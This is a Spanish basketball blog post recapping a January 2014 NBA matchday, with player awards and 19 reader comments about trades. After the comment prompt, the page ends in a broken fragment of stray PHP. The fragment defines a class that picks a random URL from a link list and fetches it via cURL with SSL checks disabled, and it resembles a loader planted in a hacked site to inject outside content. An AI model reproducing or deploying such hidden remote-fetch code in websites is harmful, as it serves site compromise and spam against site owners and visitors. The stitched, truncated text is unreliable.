La Crónica: Día festivo

21 de January de 2014 por Simon

Ayer fue el día de Martin Luther King Day en Estados Unidos o lo que es lo mismo, día festivo para los norteamericanos y partidos NBA desde bien temprano. La jornada de ayer comenzaba a las 7 de la tarde en España y la rueda no pararía hasta aproximadamente las 7 de la mañana cuando David West anotaba los últimos tiros libres del partido entre Golden State Warriors e Indiana Pacers. 12 horas seguidas de espectáculo baloncestístico para todos los gustos y edades.

Precisamente el partido de la jornada era el último, el complicado compromiso que tenía Indiana al visitar el Oracle Arena para enfrentarse a los Warriors. A pesar de ser un duelo a priori complicado los Pacers tardaron sólo 12 minutos en poner tierra de por medio. Hasta mediado el tercer cuarto Indiana siempre se movió en ventajas que rondaban los 15 puntos pero entre Curry y Lee consiguieron reducir esa ventaja y soñar con la remontada pero les faltó un pasito más. Los Pacers no se pusieron nerviosos en ningún momento y solventaron un partido importantísimo al ser el primero de su gira por el Oeste (102-94). Tampoco ponen nerviosos a los Pacers unos Heat que cada día están más lejos en la clasificación. Ayer  perdieron su cuarto partido de los últimos seis y cada vez tienen más difícil arrebatar la ventaja de campo a los actuales líderes de la conferencia de cara a las eliminatorias por el título. En un partido en el que las defensas no existieron los Hawks lograron hacer valer su factor cancha y vencer a los campeones que, a pesar de que el partido estaba en el aire, fueron incapaces de anotar en el último minuto (114-121). En los Hawks sólo Jeff Teague con 2 y Elton Brand con 8 anotaron menos de 10 puntos. 

Otros que se olvidaron de defender fueron los Rockets y los Blazers. Houston demostró una vez más que en casa es un equipo muy sólido y complicado de derrotar. Ayer le tocó comprobarlo a los Blazers que se vieron desde muy pronto a remolque e incapaces de revertir la situación (113-126). Con este resultado los Rockets aprietan el vagón intermedio de la conferencia. Lo que, de momento, no se aprieta es la lucha por los Play Off en el Oeste. Y es que los Grizzlies vieron cortada su racha de victorias contra todo pronóstico en cada ante los New Orleans Pelicans (95-92). Con esta derrota los Grizzlies suman su décima derrota consecutiva contra equipos de la división Southwest. Memphis es el único equipo que aún no ha conseguido esta temporada vencer a un equipo de su misma división. Curiosamente lo mismo le sucedería a Pelicans en caso de no existir los Grizzlies porque las únicas tres victorias que han logrado en su división han sido contra los de Tennesse.

En el partido con más morbo de la jornada los Nets festejaron el retorno de Deron humillando a los Knicks. El partido apenas tuvo historia más allá del duelo entre equipos de la misma ciudad pues Joe Johnson se hizo amr y señor del duelo desde el primer momento y afianza aún más a sus Nets en Play off (103-80). Otro duelo interesante era la visita de los Lakers al United Center que se resolvió en la prórroga con un protagonista inesperado. Taj Gibson anotó la canasta definitiva en el último segundo de la prórroga que dio la victoria a unos Bulls que ya amenazan la tercera plaza de la conferenía (100-102). Hay equipos a los que nunca, pase lo que pase, se les puede dar por muertos.

En el capítulo de “casi-remontadas” encontramos a Cavaliers y Raptors. Ambos llegaron a sufrir desventajas superiores a los 20 puntos y ambos se quedaron a las puertas de la victoria. Cleveland cayó antos unos Mavs que querían desquitarse de la abultada derrota sufrida en la jornada anterior ante los Blazers. Nowitzki y compañía se las prometían muy felices en el primer tiempo pero los Cavs terminaron metiéndoles el miedo en el cuerpo con opciones de empatar el partido hasta el último segundo (102-97). Más espectacular hubiera sido la remontada de los Raptors en Charlotte en caso de haberse producido. Pasado el ecuador del tercer cuarto la ventaja de los Bobcats superaba los 30 puntos pero una buena racha de Novak y la buena dirección de Vásquez acercaron a los Raptors hasta sólo un punto a falta de 20 segundos. Desgraciadamente para ellos Lowry falló el tiro libre que hubiera empatado el duelo y los Cats cerraron el encuentro con tiros libres (95-100).

El resto de choques de la jornada fueron tan insulsos como parecían en un principio. Los Clippers no tuvieron ningún problema en deshacerse de unos patéticos Pistons que dieron peores sensaciones de lo que refleja el marcador (112-103). Por su parte, los Wizards pescaron en rio revuelto y con la victoria sobre Philadelphia  (99-107) igualan a Raptors y Bulls en la clasificación.

PREMIOS

MVP: Impresionante momento de forma el que atraviesa Al Jefferson. Ayer se impuso a todo el juego interior de los Raptors con 22 puntos, 19 rebotes, 7 asistencias y 2 tapones. El MVP sería claramente para él sinó fuera porque Chandler Parson cuajó su mejor partido de la temporada frente los Blazers. 31 puntos, 10 rebotes, 7 asistencias y 2 tapones ante un gran defensor como es Nico Batum.

Rookie: Michael Carter-Williams lideró a los Sixers como acostumbra: a lo grande. 31 puntos, 6 rebotes, 5 asistencias y 3 robos para el ex de Syracuse.

Sorpresa: Bradley Beal explotó cuando más falta hacía. A su acostumbrada faceta anotadora (22 puntos) sumó 9 rebotes y 8 asistencias. 19 puntos y 12 rebotes para Andray Blatche en 27 minutos. Si la cabeza estuviera al mismo nivel que sus condiciones sería jugador franquicia.

Decepción:0 puntos Brandon Jennings con un 0 de 7 en tiros de campo. Su compañero Greg Monroe (6 puntos y 3 rebotes) tampoco pasa por un gran momento.

Esfuerzo en vano: Lamarcus Aldridge fue el mejor de unos Blazers que le pusieron las cosas difíciles a los Rockets en su casa. Sus 27 puntos y 20 rebotes fueron insuficientes ante el empuje local.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

19 comentarios a esta entrada

  1. rumbero dice:
    #1

    No aprendo. Suerte que el horario acompañaba, porque el tour de visionado Pistons – Cavs – Knicks fue como para no verlos más hasta que acabe la temporada. La verdad es que sigo sin entender esa confianza que hay en los despachos con los respectivos entrenadores, siendo la pieza más fácil de cambiar para motivar un cambio y sabiendo que son equipos construidos para meterse en PO y que tienen “dolencias” crónicas desde el primer partido de temporada sin que nadie haya sabido subsanarlas.

    Algo bueno, pues que acabó de ver que DJ Augustin se marcó un 27/4/4. Viendo como está jugando con los Bulls (y de como lo venía haciendo el chaval), Thibs ya tiene a su Nate para esta temporada. Un monumento a este hombre por dios

      Citar

  2. Denise dice:
    #2

    Todos los palos de este último Draft se los está llevando Bennet y con razón, pero ojo con el pick 3 Otto Porter que su temporada es igual o peor que la del de los Cavs y ya suena que lo van a mandar a la D-League.

    Otra cosa, Beno Udrih ha pedido marcharse de los Knicks

      Citar

  3. CAMPO2 dice:
    #3

    Creo que en los Knicks han pedido todos el traspaso.

      Citar

  4. TheDeerHunter dice:
    #4

    Estuve viendo a los Grizzlies, que hacía tiempo no les dedicaba atención.
    A colación de lo que se ha venido hablando últimamente tremendamente decepcionante la aportación de sus interiores suplentes. Jugaron poco, diréis, pero deberían haber jugado aún menos si hubieran estado obligados a ganar este partido.

      Citar

  5. Esteban dice:
    #5

    Denise:
    Todos los palos de este último Draft se los está llevando Bennet y con razón, pero ojo con el pick 3 Otto Porter que su temporada es igual o peor que la del de los Cavs y ya suena que lo van a mandar a la D-League.

    y Alex Len como pick 5? Zaller en el 4? McLemore en el 7? Noel en el 6? Pope en el 8?

    el peor draft de la historia?

      Citar

  6. Esteban dice:
    #6

    otro enorme partido de Al Jefferson, cuando dejara de ser tan subestimado en esta liga?

      Citar

  7. Esteban dice:
    #7

    varias cortatias:

    El traspaso de RONDO suena cada vez con mas fuerza y los Pistons se anotan, se habla de entregar a Monroe, y los contratos a expirar de Villanueva y Stuckey, aunque personalmente, creo que boston querra empaquetar a Wallace aunque tenga q entrar algunas de las rondas que les dieron los Nets

    Boston tambien quiere salir de Green, que no lo ha hecho del tdo bien este año y tiene un contrato acorde; se habla con fuerza de Asik, creo que ambos saldrian ganando, y los celtics de concretar ambas movidas ¡, saldrian con un juego interior Monroe-Asik y practicamente limpios en salarios para el proximo año

    Se viene un trade por Melo, ayer volvio a quejarse de su equipo y no es la primera vez, los Knicks deberian cambiarlo ahora si pueden y sacar algo por el, pues con los salrios que tienen comprometidos para la proxima temporada, no pueden ofrecerle a Melo mejorar la plantilla

    Todo esto puede resumirse, en un super Trade, entre Boston y Los Knicks, que involucre a Green, Rondo y Sullinger, por Melo, Chandler, Udrih y Hardaway

      Citar

  8. Esteban dice:
    #8

    entre las sorpresas falta D.J. Augustine, que jugo quizá uno de los mejores partidos de su carrera

    Otro enorme enorme juego de Gasol, esta jugando al nivel de sus 3 primeros años en el LA o no?

    jugando al Money Ball, NIck young es el juegador de mayor producción en comparación a su salario no?

      Citar

  9. Vader dice:
    #9

    @Esteban

    Un trade Boston NY por Melo sólo lo veo con sentido si Rondo se queda en Boston. Es sólo una “fantasia” pero que podria tener sentido para los dos:

    NY da: Melo, Chandler, Shumpert.

    Boston da: Wallace, Humpries, Green + ¿3 o 4 primeras rondas?

    * y añadid algún jugador de relleno en cualquier lado cuadrar salarios.

    Con un trade así Boston seria contender de golpe otra vez: Rondo, Bradley, Shumpert, Melo y Chandler (podrian jugar con Melo de 4 o con Bass o buscar otro trade para reforzar el juego interior).

    Los Knicks podrian empezar a reconstruir con esas rondas y armarse de paciencia…

      Citar

  10. Denise dice:
    #10

    TheDeerHunter:
    Estuve viendo a los Grizzlies, que hacía tiempo no les dedicaba atención.
    A colación de lo que se ha venido hablando últimamente tremendamente decepcionante la aportación de sus interiores suplentes.Jugaron poco, diréis, pero deberían haber jugado aún menos si hubieran estado obligados a ganar este partido.

    Bueno Deer, ha sido un partido determinado, y tampoco han tenido mucho tiempo en pista para hacer cosas. Yo me quedo con la versión que han dado Leuer, Koufos y Davis cuando Randolph ó Marc han estado lesionados. Sus aportaciones han sido buenísimas y han suplido bastante bien las bajas de ambos.

      Citar

  11. Ruxixon dice:
    #11

    CAMPO2:
    Creo que en los Knicks han pedido todos el traspaso.

    xDDD

    Buen apunte Nick Young,pero por rendimiento – contrato me quedo sin ninguna duda con Parsons,y no porque se haya marcado un partidazo hoy,es que es un jugador de equipo tremendo y clave en estos Rockets ya desde su temporada rookie,y todo esto por menos de un millón de $ oiga.Encima te llega Howard y te tienes que hacer a un lado por cuestión de roles y lo acepta encantado.Ponga un Parsons en su vida.

    Un mes para el cierre del mercado y empieza el baile.Entiendo que ofrezcan a Green que como 2ª-3ª espada de los nuevos C’s no lo veo.Por otro lado,Monroe es un jugador de infinita clase pero 0 sangre,y con el miedo en el cuerpo de que te pueda pedir un máximo.Tiene un valor altísimo y los Pistons tienen a Josh Smith jugando de 3.Dumars (oh no,es Dumars!) puede buscar la enésima redención robando a alguien con todos esos condicionantes.Para mí es lo que deberían hacer.

    Sobre que se queden un año más Jabari para intentar ganar el campeonato para Duke con el recruit de Okafor,Embiid para hacerse más jugador…puede ser unas risas del copón viendo la de equipos que se echan las manos a la cabeza.A mí me parece fenomenal si van a progresar como jugadores y añadir más fundamentos pero tengo que decir que no me lo creo.

      Citar

  12. Denise dice:
    #12

    Ruxixon: xDDD

    Buen apunte Nick Young,pero por rendimiento – contrato me quedo sin ninguna duda con Parsons,y no porque se haya marcado un partidazo hoy,es que es un jugador de equipo tremendo y clave en estos Rockets ya desde su temporada rookie,y todo esto por menos de un millón de $ oiga.Encima te llega Howard y te tienes que hacer a un lado por cuestión de roles y lo acepta encantado.Ponga un Parsons en su vida.

    Para mí es Blatche indiscutiblemente y jugadores como Parsons ó Marshall no los cuento porque están en contratos rookies estipulados por su posición en el Draft, no así gente como Blatche ó Young que sí podrían estar legitimamente con contratos de 5-6 kilos (más aun para Blatche) y cobran casi el mínimo.

      Citar

  13. Denise dice:
    #13

    Ruxixon: xDDD

    Un mes para el cierre del mercado y empieza el baile.Entiendo que ofrezcan a Green que como 2ª-3ª espada de los nuevos C’s no lo veo.Por otro lado,Monroe es un jugador de infinita clase pero 0 sangre,y con el miedo en el cuerpo de que te pueda pedir un máximo.Tiene un valor altísimo y los Pistons tienen a Josh Smith jugando de 3.Dumars (oh no,es Dumars!)puede buscar la enésima redención robando a alguien con todos esos condicionantes.Para mí es lo que deberían hacer.

    Pues si, ya empezó el baile de rumores, de los cuales, el 95% será humo, pero es divertido.
    Hace unos días, en un medio de Detroit se hacían eco de un movimiento que planeaba los Pistons, el plan A era un Greg Monroe por Bradley Beal y el Plan B un Stuckey (expiring) por Afflalo.

      Citar

  14. Esteban dice:
    #14

    Monroe por bradley beal estan locos? Sera gusto personal, pero beal ya el proximo año sera el mejor escolta del este, este año una lesion corto su progresion pero lo veo sin techo

      Citar

  15. Denise dice:
    #15

    Esteban:
    Monroe por bradley beal estan locos? Sera gusto personal, pero beal ya el proximo año sera el mejor escolta del este, este año una lesion corto su progresion pero lo veo sin techo

    A ver, esto venia en un medio de Detroit, habrá que ver que piensan en Washington. Y como digo, el 95% de rumores en este tiempo es humo, divertido, pero humo para vender periodicos.
    Beal es un gran jugador que a parte de anotar, rebotea, asiste y ayuda en otras facetas del juego, pero el mejor escolta no sé yo.., creo que debe mejorar su selección de tiro porque a veces se convierte en un lanzapiedras desesperante.
    El nivel del Este no es gran cosa, pero Wade, Stephenson y JoJo (sin mirar su contratito) pueden estar por delante suya aún. Eso sí, a sus compañeros de Draft como Waiters, Gilchrist ó Ross, se los cepilla con la gorra.

      Citar

  16. TheDeerHunter dice:
    #16

    Denise: Bueno Deer, ha sido un partido determinado, y tampoco han tenido mucho tiempo en pista para hacer cosas. Yo me quedo con la versión que han dado Leuer, Koufos y Davis cuando Randolph ó Marc han estado lesionados. Sus aportaciones han sido buenísimas y han suplido bastante bien las bajas de ambos.

    Supongo que llevas razón. Sólo digo que lo que vi ayer de la banca de Grizzlies no me gustó nada y Zach ya ha avisado que se lo va a pensar mucho para ejercer su player option, así que es bastante probable que puedan haber novedades en esa dirección muy pronto. En ese momento veríamos si están preparados de verdad para dar un paso al frente.

      Citar

  17. Melo15 dice:
    #17

    Para que van a traspasar los Wizards a Beal por Monroe si este ultimo es agente libre y dudo que vuelva a Detroit donde han apostado claramente por Drummons.
    Por cierto, los Wizards con el dinero que libera Gortat podria lanzarse a por Monroe y les quedaria un equipazo.
    PD: Yo aun confio en Otto Porter, creo que no le han dado oportunidades.

      Citar

  18. Esteban dice:
    #18

    Melo15:
    Para que van a traspasar los Wizards a Beal por Monroe si este ultimo es agente libre y dudo que vuelva a Detroit donde han apostado claramente por Drummons.
    Por cierto, los Wizards con el dinero que libera Gortat podria lanzarse a por Monroe y les quedaria un equipazo.
    PD: Yo aun confio en Otto Porter, creo que no le han dado oportunidades.

    con el contratazo de Nene, claramente prefiero a Beal antes que a Monroe, puesto que el escolta aun esta en desarrollo y le veo un techo mucho mas alto, mientras que Monroe, esta en el mismo nivel desde su segundo año, no ha despegado ni parece que lo fuera a hacer, al contrario quiza esta hasta un paso en retroceso y mientras tanto pretendera un pastizal mientras que Beal aun continuara con su contrato rookie

    detroit, ante la inminencia de la agencia libre de Monroe, deberia ofercer algo mas, quiza hasta un pick de primera ronda

      Citar

  19. Viva_Dirk dice:
    #19

    Los Pistons necesitan traspasar a Monroe desde que firmaron a Josh Smith, y si Melo no quiere seguir en los Knicks los Pistons serían un buen destino.

    Monroe+expirings+ronda por Melo

    Eso deja a Detroit con un equipo muy físico, con anotadores exteriores e interiores que intimidan y rebotean bien, a la vez que pueden jugar a un ritmo muy alto. Y a los Knicks les ahorra un dinero ya que aunque tuvieran que pagarle el máximo a Monroe sería mas bajo que lo que deben pagarle a Melo, y les da flexibilidad para armar la plantilla.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>